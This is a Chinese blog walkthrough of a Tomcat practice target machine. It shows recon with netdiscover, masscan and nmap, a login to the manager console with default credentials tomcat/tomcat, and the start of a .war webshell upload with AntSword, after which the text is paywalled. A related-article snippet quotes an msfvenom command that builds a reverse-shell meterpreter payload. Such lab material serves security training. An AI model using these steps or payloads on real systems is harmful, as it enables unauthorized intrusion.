tomcat 靶机

最新推荐文章于 2024-05-04 21:00:00 发布
最新推荐文章于 2024-05-04 21:00:00 发布
阅读量1.5k 收藏 4
点赞数 2
分类专栏: Linux 靶机练习 Web安全 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/123731211
版权

文章目录

tomcat 靶机

1.信息收集

1.1 主机发现

netdiscover

目标IP地址

192.168.81.151

image-20220325085211797

1.2 端口扫描

masscan --rate=1000 -p 0-65535 192.168.81.151

收集到有两个端口是开放的

22
8080

image-20220325085445785

1.3 端口服务识别

nmap -sV -T4 -O 192.168.81.151 -p 22,8080

可以看到

  • 22端口:ssh服务
  • 8080端口:http服务

image-20220325085629890

直接进入8080端口,发现服务器版本信息

http://192.168.81.151:8080/

image-20220325093428273

1.4 御剑扫描

192.168.81.151:8080

扫描到的网址

http://192.168.81.151:8080/manager

image-20220325090210796

打开网址,打开网址的时候会弹出一个登录窗体

http://192.168.81.151:8080/manager

image-20220325090441522

默认密码为

账户:tomcat
密码:tomcat

登录之后我们就进入了管理员界面

image-20220325093726847

2.漏洞探测

2.1 文件上传漏洞

从管理员界面我们可以看到一个可以上传文件的地方

但只能上传.war结尾的文件

image-20220325095056068

2.1 蚁剑连接

2.1.1 木马文件生成

用中国蚁剑中的插件进行生成

  • 在蚁剑连接过的网络中,点击鼠标【右键】–【加载插件】–【默认分类】
  • 可以看到里面有两个生成Shell的功能
  • 任选其一即可
最低0.47元/天 解锁文章
小小西贝
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Tomcat靶机渗透
weixin_56306210的博客
12-28 2411
Tomcat靶机渗透
msfvenom常用参数
m0_61506558的博客
08-29 1538
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
【vulhub靶场】Tomcat中间件漏洞复现
最新发布
M372109150的博客
05-04 1706
本文主要是对tomcat中间件相关漏洞的复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞。
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3366
高危src挖掘
msf的用法,msfvenom生成shell
Xkhf1的博客
10-02 210
开头的则是exp漏洞利用模块,先探测如果可行,再使用exp模块,使用方法一样。用msfvenom模块生成一个基于tcp的反弹shell木为shell.exe,攻击机为:192.168.112.148,监听端口为:4444 ,​ 此时生成的是一个.exe文件,我们需要将这个.exe文件交给目标,让目标把.exe文件放在目标主机上我们才能运行,或者我们可以上传到目标主机。不到,那么利用之前信息搜集收集到的web容器版本,数据库版本,操作系统版本等,用。是生成的木类型,这里是.exe文件,
Apache Flink (最新版本) 远程代码执行
自强不息
05-04 706
路虽远,行则将至;事虽难,做则必成
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
中国蚁剑安装使用教程
热门推荐
天天学安全专属博客
03-29 1万+
中国蚁剑安装教程,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括蚁剑的下载,连接一句话木,更改木连接参数,绕过WAF。
tomcat系统登录部署漏洞—msf破解及war包部署getshell
Sea_Sand息禅
04-11 1838
跟着大佬学习的,如有问题,欢迎指教。 tomcat是一个很常见的java web application服务器 此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解 0x00:环境部署 1、java环境,以便运行xmapp 2、xmapp下载:https://www.apachefriends.org/index.html 3、运行xmapp的tomc...
20155234 Exp3 免杀原理与实践
weixin_30877227的博客
04-10 77
使用msf编码器生成jar包 使用指令:msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.157.141 lport=5234 x> 5234_backjar.jar 上传扫描的结果: 结果还行 使用veil-evasion生成反弹链接的可执行文件: 下载安装好veil之后,进入veil生成 回连成功: 扫描结果: 利用s...
【漏洞复现】Tomcat弱口令+后台getshell
m0_52450604的博客
02-07 658
【漏洞复现】Tomcat弱口令+后台getshell
关于tomcat下webapps里.war包生成ROOT目录以及项目启动两次(不是tomcat启动2次)
weixin_43923617的博客
06-12 3367
为什么生成ROOT并且启动2次 tomcat在启动后会默认访问ROOT目录,如果把ROOT删了话,tomcat会自动创建一个ROOT文件夹,再把.war内容解压到ROOT里面(第一次启动)。 接着在创建一个.war本身项目的名字,再次解压(第二次启动)。 解决 tomcat的conf里面server.xml里面的Host节点添加Context,例子: 添加之前 添加之后 第一次写,有点语无伦次…...
MSF生成及木的简单使用
爱喝水的仙人树的博客
11-03 8816
本文将介绍有关MSF模块的简单使用方式,介绍常见的几种木生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 679
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值